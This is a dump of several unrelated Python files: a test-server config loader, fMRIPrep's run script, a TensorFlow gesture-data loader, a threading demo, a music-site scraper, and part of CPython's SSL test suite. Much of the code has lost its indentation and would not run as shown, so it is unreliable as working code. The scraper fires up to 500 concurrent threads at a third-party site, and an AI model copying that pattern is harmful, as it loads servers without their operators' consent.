else:
rv[key] = override_obj[key]
return rv
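# Illustrative sketch (not part of the original module): how merge_json()
# combines the default config with an override. Keys that appear only in the
# override (e.g. "extra" below) are dropped, because the merge iterates over
# the base object's keys. Never called here.
def _example_merge_json():
    base = {"host": "web-platform.test", "ports": {"http": [8000], "ws": [8001]}}
    override = {"ports": {"http": [9000]}, "extra": True}
    merged = merge_json(base, override)
    # merged == {"host": "web-platform.test", "ports": {"http": [9000], "ws": [8001]}}
    return merged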
def get_ssl_environment(config):
implementation_type = config["ssl"]["type"]
cls = sslutils.environments[implementation_type]
try:
kwargs = config["ssl"][implementation_type].copy()
except KeyError:
raise ValueError("%s is not a vaid ssl type." % implementation_type)
return cls(logger, **kwargs)
def load_config(default_path, override_path=None, **kwargs):
if os.path.exists(default_path):
with open(default_path) as f:
base_obj = json.load(f)
else:
raise ValueError("Config path %s does not exist" % default_path)
if os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
else:
override_obj = {}
rv = merge_json(base_obj, override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
base_obj = rv
with open(other_path) as f:
override_obj = json.load(f)
rv = merge_json(base_obj, override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
rv[key] = value
set_computed_defaults(rv)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
return parser
def run(**kwargs):
config = load_config(os.path.join(repo_root, "config.default.json"),
os.path.join(repo_root, "config.json"),
**kwargs)
setup_logger(config["log_level"])
stash_address = None
if config["bind_hostname"]:
stash_address = (config["host"], get_port())
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
with get_ssl_environment(config) as ssl_env:
config_, servers = start(config, ssl_env, build_routes(config["aliases"]), **kwargs)
try:
while any(item.is_alive() for item in iter_procs(servers)):
for item in iter_procs(servers):
item.join(1)
except KeyboardInterrupt:
logger.info("Shutting down")
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""fMRI preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
import os
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
sentry_sdk = None
if not config.execution.notrack:
import sentry_sdk
from ..utils.sentry import sentry_setup
sentry_setup()
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get('return_code', 0)
fmriprep_wf = retval.get('workflow', None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of fMRIPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if fmriprep_wf and config.execution.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
retcode = retcode or (fmriprep_wf is None) * os.EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate,
args=(str(config_file), fmriprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
if sentry_sdk is not None:
with sentry_sdk.configure_scope() as scope:
scope.set_tag('run_uuid', config.execution.run_uuid)
scope.set_tag('npart', len(config.execution.participant_label))
sentry_sdk.add_breadcrumb(message='fMRIPrep started', level='info')
sentry_sdk.capture_message('fMRIPrep started', level='info')
config.loggers.workflow.log(15, '\n'.join(
['fMRIPrep config:'] + ['\t\t%s' % s for s in config.dumps().splitlines()])
)
config.loggers.workflow.log(25, 'fMRIPrep started!')
errno = 1 # Default is error exit unless otherwise set
try:
fmriprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
from ..utils.sentry import process_crashfile
crashfolders = [
config.execution.output_dir / 'fmriprep'
/ 'sub-{}'.format(s) / 'log' / config.execution.run_uuid
for s in config.execution.participant_label
]
for crashfolder in crashfolders:
for crashfile in crashfolder.glob('crash*.*'):
process_crashfile(crashfile)
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
config.loggers.workflow.critical('fMRIPrep failed: %s', e)
raise
else:
config.loggers.workflow.log(25, 'fMRIPrep finished successfully!')
if not config.execution.notrack:
success_message = 'fMRIPrep finished without errors'
sentry_sdk.add_breadcrumb(message=success_message, level='info')
sentry_sdk.capture_message(success_message, level='info')
# Bother users with the boilerplate only iff the workflow went okay.
if (config.execution.output_dir / 'fmriprep' / 'logs' / 'CITATION.md').exists():
config.loggers.workflow.log(
25, 'Works derived from this fMRIPrep execution should '
'include the following boilerplate:\n\n%s',
(config.execution.output_dir / 'fmriprep' / 'logs' / 'CITATION.md').read_text()
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'fmriprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'fmriprep' / 'desc-aparcaseg_dseg.tsv'))
errno = 0
finally:
from niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.work_dir,
config.execution.run_uuid,
config=pkgrf('fmriprep', 'data/reports-spec.yml'),
packagename='fmriprep')
write_derivative_description(
config.execution.bids_dir,
config.execution.output_dir / 'fmriprep')
if failed_reports and not config.execution.notrack:
sentry_sdk.capture_message(
'Report generation failed for %d subjects' % failed_reports,
level='error')
sys.exit(int((errno + failed_reports) > 0))
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
data_set_helpers.py
|
import pandas
import tensorflow as tf
import numpy as np
from threading import Thread
from math import ceil
from six.moves import range
from gesgen_keras.util.audio import audiofile_to_input_vector
from gesgen_keras.util.gesture import gesturefile_to_label_vector
from gesgen_keras.util.gpu import get_available_gpus
from gesgen_keras.util.text import ctc_label_dense_to_sparse, text_to_char_array
class DataSets(object):
def __init__(self, train, dev, test):
'''Container for train, dev and test sets of one corpus.
Args:
train (DataSet): the train data set of the corpus
dev (DataSet): the validation data set of the corpus
test (DataSet): the test data set of the corpus
'''
self._dev = dev
self._test = test
self._train = train
    def start_queue_threads(self, session, coord):
        # Forward the coordinator so each DataSet can register its threads.
        self._dev.start_queue_threads(session, coord)
        self._test.start_queue_threads(session, coord)
        self._train.start_queue_threads(session, coord)
@property
def train(self):
return self._train
@property
def dev(self):
return self._dev
@property
def test(self):
return self._test
class DataSet(object):
def __init__(self, files_list, thread_count, batch_size, numcep, numcontext, next_index=lambda x: x + 1):
numchannels = 6
numjoints = 51
self._coord = None
self._numcep = numcep
self._x = tf.placeholder(tf.float32, [None, numcep + (2 * numcep * numcontext)])
self._x_length = tf.placeholder(tf.int32, [])
self._y = tf.placeholder(tf.float32, [None, numchannels * numjoints + 3])
self._y_length = tf.placeholder(tf.int32, [])
self.example_queue = tf.PaddingFIFOQueue(shapes=[[None, numcep + (2 * numcep * numcontext)], [], [None, numchannels * numjoints + 3], []],
dtypes=[tf.float32, tf.int32, tf.float32, tf.int32],
capacity=2 * self._get_device_count() * batch_size)
self._enqueue_op = self.example_queue.enqueue([self._x, self._x_length, self._y, self._y_length])
self._close_op = self.example_queue.close(cancel_pending_enqueues=True)
self.batch_size = batch_size
self._numcontext = numcontext
self._thread_count = thread_count
self._files_list = self._create_files_list(files_list)
self._next_index = next_index
def _get_device_count(self):
available_gpus = get_available_gpus()
return max(len(available_gpus), 1)
def start_queue_threads(self, session, coord):
self._coord = coord
batch_threads = [Thread(target=self._populate_batch_queue, args=(session,)) for i in range(self._thread_count)]
for batch_thread in batch_threads:
self._coord.register_thread(batch_thread)
batch_thread.daemon = True
batch_thread.start()
return batch_threads
def close_queue(self, session):
session.run(self._close_op)
def _create_files_list(self, files_list):
# 1. Sort by wav filesize
# 2. Select just wav filename and bvh filename columns
# 3. Return a NumPy representation
return files_list.sort_values(by="wav_filesize") \
.ix[:, ["wav_filename", "bvh_filename"]] \
.values
def _indices(self):
index = -1
while not self._coord.should_stop():
index = self._next_index(index) % len(self._files_list)
yield self._files_list[index]
def _populate_batch_queue(self, session):
for wav_file, bvh_file in self._indices():
source = audiofile_to_input_vector(wav_file, self._numcep, self._numcontext)
source_len = len(source)
target = gesturefile_to_label_vector(bvh_file)
target_len = len(target)
source, source_len, target, target_len = self._clip_vectors(source, source_len, target, target_len)
#print("source_len: " + str(source_len))
#print("target_len: " + str(target_len))
try:
session.run(self._enqueue_op, feed_dict={
self._x: source,
self._x_length: source_len,
self._y: target,
self._y_length: target_len})
except tf.errors.CancelledError:
return
def _clip_vectors(self, source, source_len, target, target_len):
# clip the longer vector so that the lengths are equal(experimental)
if source_len > target_len:
source = np.delete(source, np.s_[target_len:], 0)
source_len = target_len
elif source_len < target_len:
target = np.delete(target, np.s_[source_len:], 0)
target_len = source_len
return source, source_len, target, target_len
def next_batch(self):
source, source_lengths, target, target_lengths = self.example_queue.dequeue_many(self.batch_size)
#sparse_labels = ctc_label_dense_to_sparse(target, target_lengths, self.batch_size)
return source, source_lengths, target
@property
def total_batches(self):
# Note: If len(_files_list) % batch_size != 0, this re-uses initial files
return int(ceil(len(self._files_list) / self.batch_size))
class SwitchableDataSet(object):
def __init__(self, data_sets):
'''Data set that is wrapping a data sets instance to switch between train, dev and test instances during training.
Args:
data_sets (DataSets): the corpus container holding all three data sets
'''
self._data_sets = data_sets
self._sets = [data_sets.train, data_sets.dev, data_sets.test]
self._queues = [s.example_queue for s in self._sets]
self._queue_selector = tf.placeholder(tf.int32, name='Queue_Selector')
self._queue = tf.QueueBase.from_list(self._queue_selector, self._queues)
self._close_op = self._queue.close(cancel_pending_enqueues=True)
self._data_set = data_sets.train
def set_data_set(self, feed_dict, data_set):
index = self._sets.index(data_set)
assert index >= 0
feed_dict[self._queue_selector] = index
self._data_set = data_set
def start_queue_threads(self, session, coord):
batch_threads = []
for s in self._sets:
batch_threads += s.start_queue_threads(session, coord)
return batch_threads
def close_queue(self, session):
for s in self._sets:
s.close_queue(session)
session.run(self._close_op, feed_dict={ self._queue_selector: 0 })
def next_batch(self):
source, source_lengths, target, target_lengths = self._queue.dequeue_many(self._data_set.batch_size)
#sparse_labels = ctc_label_dense_to_sparse(target, target_lengths, self._data_set.batch_size)
return source, source_lengths, target
def read_data_sets(train_csvs, dev_csvs, test_csvs,
train_batch_size, dev_batch_size, test_batch_size,
numcep, numcontext, thread_count=8,
stride=1, offset=0, next_index=lambda s, i: i + 1,
limit_dev=0, limit_test=0, limit_train=0):
# Read the processed set files from disk
def read_csvs(csvs):
files = None
for csv in csvs:
file = pandas.read_csv(csv)
if files is None:
files = file
else:
files = files.append(file)
return files
train_files = read_csvs(train_csvs)
dev_files = read_csvs(dev_csvs)
test_files = read_csvs(test_csvs)
# Create train DataSet from all the train archives
train = _read_data_set(train_files, thread_count, train_batch_size, numcep, numcontext, stride=stride, offset=offset, next_index=lambda i: next_index('train', i), limit=limit_train)
# Create dev DataSet from all the dev archives
dev = _read_data_set(dev_files, thread_count, dev_batch_size, numcep, numcontext, stride=stride, offset=offset, next_index=lambda i: next_index('dev', i), limit=limit_dev)
# Create test DataSet from all the test archives
test = _read_data_set(test_files, thread_count, test_batch_size, numcep, numcontext, stride=stride, offset=offset, next_index=lambda i: next_index('test', i), limit=limit_test)
# Return DataSets
return DataSets(train, dev, test)
def _read_data_set(filelist, thread_count, batch_size, numcep, numcontext, stride=1, offset=0, next_index=lambda i: i + 1, limit=0):
# Optionally apply dataset size limits
if limit > 0:
filelist = filelist.iloc[:limit]
filelist = filelist[offset::stride]
# Return DataSet
return DataSet(filelist, thread_count, batch_size, numcep, numcontext, next_index=next_index)
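# Illustrative usage sketch (not part of the original module): wiring the
# queue-backed data sets into a TF1 session. The CSV paths and feature sizes
# below are hypothetical placeholders; never called here.
def _example_usage():
    data_sets = read_data_sets(["train.csv"], ["dev.csv"], ["test.csv"],
                               train_batch_size=16, dev_batch_size=16,
                               test_batch_size=16, numcep=26, numcontext=9)
    coord = tf.train.Coordinator()
    with tf.Session() as session:
        threads = data_sets.train.start_queue_threads(session, coord)
        # next_batch() returns graph tensors; running them dequeues one padded batch.
        source, source_lengths, target = data_sets.train.next_batch()
        # ... build the model on `source`/`target` and session.run(...) it ...
        coord.request_stop()
        data_sets.train.close_queue(session)
        coord.join(threads)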
|
thread.py
|
import threading
from time import sleep
lock = threading.Lock()
# function that waits 1 second and then releases the lock
def wait():
global lock
while True:
sleep(1)
lock.release()
def LerVelocidade():
global lock
while True:
lock.acquire()
        print('Reading speed')
        print('got here')
# ---------------- creating the threads
lock.acquire()
t = threading.Thread(target=wait, name='Wait')
t1 = threading.Thread(target=LerVelocidade, name='Velocidade')
t.start()
t1.start()
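# Illustrative alternative (not part of the original script): the same
# one-second pacing expressed with threading.Event, which avoids releasing a
# lock from a thread that never acquired it. Reuses the imports at the top of
# this file; nothing below is started automatically.
def event_ticker(tick, period=1.0):
    while True:
        sleep(period)
        tick.set()

def event_reader(tick):
    while True:
        tick.wait()
        tick.clear()
        print('Reading speed (event-paced)')

# Example wiring (commented out so this module keeps its original behaviour):
# tick = threading.Event()
# threading.Thread(target=event_ticker, args=(tick,), daemon=True).start()
# threading.Thread(target=event_reader, args=(tick,), daemon=True).start()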
|
song.py
|
import requests
import re
from bs4 import BeautifulSoup
import json
import time
import threading
import os
import pickle
headers = {
"Host":"music.163.com",
"Referer":"http://music.163.com/",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"}
def Find(pat,text):
match = re.search(pat,text)
if match == None:
return ''
#print(match.group(1))
return match.group(1)
def getSong2(idSong = "246316"):
global fileSong,lock,threads,hashSongvisited
urlSong = 'http://music.163.com/song?id='
try:
r = requests.get(urlSong + idSong,headers = headers,timeout = 1)
except:
if lock.acquire():
threads-=1
lock.release()
return
text = r.text
patTitle = r'(?:data-res-name=")(.+?)(?:")'
title = Find(patTitle,text)
    # example match: "飞" (song title)
patAuthor = r'(?:data-res-author=")(.+?)(?:")'
author = Find(patAuthor,text)
    # example match: "洪辰" (artist)
patAlbum = r'(?:class="s-fc7">)(.*?)(?:</a>)'
album = Find(patAlbum,text)
    # example match: "72小姐" (album)
patImage = r'(?:class="j-img" data-src=")(.*?jpg)(?:">)'
image = Find(patImage,text)
    # example match: a cover-image URL such as http://p1.music.126.net/Y0MWOGVy-xhVRyhT_LnSVQ==/109951163077105754.jpg
t = ','.join([idSong,title,author,album,image])
if lock.acquire():
fileSong.write(t.encode('utf-8'))
fileSong.write('\n'.encode('utf-8'))
threads-=1
hashSongvisited[idSong] = True
lock.release()
#Initialization
if os.path.exists('song_visit.db'):
hashSongvisited = pickle.load(open('song_visit.db','rb'))
else:
hashSongvisited = {}
print('visited: ', len(hashSongvisited))
f = open('song.db','r')
fileSong = open('song_details.db','ab')
maxThreads = 500
threads = 0
lock = threading.Lock()
count = 1
last = time.time()
alpha = 0.8
for line in f:
id = line.strip('\n')
if threads<maxThreads:
if hashSongvisited.get(id,False)==False:
if lock.acquire():
threads+=1
lock.release()
time.sleep(0.005)
threading.Thread(target=getSong2,args=(id,)).start()
count+=1
if count%100==0:
if time.time()-last < alpha:
time.sleep(alpha-(time.time()-last))
try:
print("threads= ",threads,'\t',len(hashSongvisited),'\t','time= %.2f'%(time.time()-last))
except:
pass
last = time.time()
if count>=2000:
pickle.dump(hashSongvisited,open('song_visit.db','wb'))
print('-'*10+'pickled'+'-'*10)
count-=2000
while True:
time.sleep(0.5)
if lock.acquire():
if not threads:
lock.release()
break
else:
lock.release()
f.close()
fileSong.close()
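# Illustrative sketch (not part of the crawler): how the regex patterns above
# pull fields out of a song page. The HTML snippet is a made-up stand-in for a
# real music.163.com response; never called here.
def _find_example():
    snippet = '<div data-res-name="Example Song" data-res-author="Example Artist"></div>'
    title = Find(r'(?:data-res-name=")(.+?)(?:")', snippet)
    author = Find(r'(?:data-res-author=")(.+?)(?:")', snippet)
    return title, author   # -> ('Example Song', 'Example Artist')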
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
from unittest import mock
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh512.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
